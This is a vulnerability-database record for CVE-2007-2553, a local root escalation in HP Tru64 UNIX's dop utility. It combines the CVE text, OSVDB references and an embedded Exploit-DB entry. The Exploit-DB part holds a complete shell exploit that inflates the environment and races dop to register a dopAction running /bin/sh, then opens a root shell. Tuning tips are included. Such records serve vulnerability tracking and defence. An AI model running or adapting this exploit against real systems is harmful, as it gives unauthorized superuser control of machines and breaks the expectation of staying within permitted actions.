ID: CVE-2007-2553
Type: cve
Reporter: cve@mitre.org
Modified: 2018-10-16T16:44:00
Description
Unspecified vulnerability in dop in HP Tru64 UNIX 5.1B-4, 5.1B-3, and 5.1A PK6 allows local users to gain privileges via a large amount of data in the environment, as demonstrated by a long environment variable.
{"exploitdb": [{"lastseen": "2016-02-03T11:36:01", "description": "HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability. CVE-2007-2553. Local exploit for unix platform", "published": "2007-05-08T00:00:00", "type": "exploitdb", "title": "HP Tru64 5.0.1 - DOP Command Local Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2553"], "modified": "2007-05-08T00:00:00", "id": "EDB-ID:30017", "href": "https://www.exploit-db.com/exploits/30017/", "sourceData": "source: http://www.securityfocus.com/bid/23881/info\r\n\r\nHP Tru64 for UNIX is prone to a local privilege-escalation vulnerability.\r\n\r\nExploiting this issue allows local attackers to execute arbitrary code with superuser privileges.\r\nSuccessful exploits will result in a complete compromise of vulnerable computers. Failed exploit attempts will result in a denial of service. \r\n\r\n---------------------8<---------------------8<---------------------\r\n#!/bin/sh\r\n#\r\n# - Author/Credits:\r\n# Daniele Calore; orkaan <at> orkaan.org\r\n#\r\n# - Description:\r\n# HP Tru64 DOP Local Privilege Escalation Vulnerability\r\n#\r\n# UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation.\r\n# HP Security bulletin code identification: HPSBTU02211 SSRT071326\r\n# Bugtraq ID: 23881\r\n#\r\n# - Public Released:\r\n# 2007-05-09\r\n#\r\n# - System Affected:\r\n# Tru64 5.1 (ALL) (Last PatchKit: T64v51B20AS0006-20030210 - PK6 - BL20)\r\n# Tru64 5.1A (ALL) (Last PatchKit: T64V51AB24AS0006-20031031 - PK6 - BL24)\r\n# Tru64 5.1B (ALL) (Last PatchKit: T64V51BB27AS0006-20061208 - PK6 - BL26)\r\n#\r\n# - System NOT Tested:\r\n# Tru64 5.0\r\n#\r\n# - System NOT Affected:\r\n# Tru64 4.0x (dop will allways require root password, also for user root)\r\n#\r\n# - More info:\r\n# http://www.orkaan.org/tru64/orkaan_-_exp_Tru64-5.X_SSRT071326.html\r\n#\r\n\r\n#\r\n#####################\r\n\r\n# Defines:\r\n\r\nPATH=\"/sbin:/usr/sbin/:/bin:/usr/bin\"\r\nDOP=\"/usr/sbin/dop\"\r\n\r\n# Environment size target.\r\n# Change this value if you have problems.\r\nENV_TRG=38629\r\n\r\n# Sleep in seconds.\r\n# Change this value (bigger) if you have problems.\r\nSLEEP=10\r\n\r\n#\r\n#####################\r\n# Credits:\r\n\r\necho \"UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation.\"\r\necho \"HP Security bulletin code identification: HPSBTU02211 SSRT071326\"\r\necho \"Bugtraq ID: 23881\"\r\necho \"Author: Daniele Calore; orkaan <at> orkaan.org\"\r\necho \"\"\r\n\r\n#\r\n#####################\r\n# Checks:\r\n\r\n# Check User.\r\nMYUID=`id -u`\r\nif [ ${MYUID} -eq 0 ]; then\r\n echo \"Why execute this if you are allready root?\"\r\n exit 1\r\nfi\r\n\r\n# Check dop binary.\r\ntest -u \"${DOP}\"\r\nif [ $? -ne 0 ]; then\r\n echo \"${DOP} binary is without set-user ID bit... Sorry!\"\r\n exit 1\r\nfi\r\n\r\n# Check exec_disable_arg_limit.\r\nARG_LIMIT=`sysconfig -q proc exec_disable_arg_limit 2>/dev/null | tail -1 |\\\r\n cut -f3 -d\" \"`\r\nif [ \"Z${ARG_LIMIT}\" != \"Z0\" ]; then\r\n echo \"exec_disable_arg_limit is set to ${ARG_LIMIT:-none}... Sorry!\"\r\n exit 1\r\nfi\r\n\r\n#\r\n#####################\r\n# DOPAction Attack:\r\n\r\necho \"Ready:\"\r\n\r\n# Unset Display.\r\necho \"1- Unset DISPLAY.\"\r\nunset DISPLAY\r\n\r\n# Make ENV big enough.\r\necho \"2- Make ENV big enough.\"\r\nENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`\r\nENV_SIZE=`expr ${ENV_TRG} - ${ENV_SIZE} - 3`\r\nA=`perl -e \"print 'A' x ${ENV_SIZE}`; export A\r\nENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`\r\necho \" Actual ENV size is ${ENV_SIZE}; target is ${ENV_TRG};\"\r\n\r\n# Create dopAction.\r\necho \"3- Create a dopAction 'shell'.\r\n Remember to delete it.\r\n As root do:\r\n /usr/sbin/sysman -cli -delete row -comp doprc -group dopActions -key1\r\n shell\r\n\r\n Remember:\r\n - The script will never end.\r\n - If it does not run change ENV_TRG...\r\n - It is normal to see a message like:\r\n Error occurred trying to update /etc/doprc:\r\n shell already exists in /etc/doprc\r\n (This mean that the BUG is present...)\r\n\r\n You have to wait ${SLEEP} seconds.\r\n After this amount of time you will see a: '#' (the root shell prompt).\r\n\"\r\n\r\n# Fork it in Background.\r\ndop /usr/sbin/sysman -cli -add row -comp doprc -group dopActions \\\r\n-data \"shell SuperUsers {{/bin/sh *}}\" &\r\n\r\n# Run the new dopAction.\r\n# Sleep some seconds (maybe you have to change this value).\r\nsleep ${SLEEP}\r\necho \"\"\r\ndop shell\r\n\r\nexit 0\r\n# EOF\r\n---------------------8<---------------------8<---------------------\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30017/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-2553"], "description": "# No description provided by the source\n\n## References:\nVendor Specific Solution URL: https://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c01036871\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/bugtraq/2007-05/0106.html)\nSecurity Tracker: 1018021\n[Secunia Advisory ID:25197](https://secuniaresearch.flexerasoftware.com/advisories/25197/)\nOther Advisory URL: http://www.orkaan.org/tru64/orkaan_-_exp_Tru64-5.X_SSRT071326.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0123.html\nKeyword: HPSBTU02211,SSRT071326\nFrSIRT Advisory: ADV-2007-1715\n[CVE-2007-2553](https://vulners.com/cve/CVE-2007-2553)\nBugtraq ID: 23881\n", "edition": 1, "modified": "2007-05-01T05:18:24", "published": "2007-05-01T05:18:24", "href": "https://vulners.com/osvdb/OSVDB:36203", "id": "OSVDB:36203", "title": "HP Tru64 UNIX dop Unspecified Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}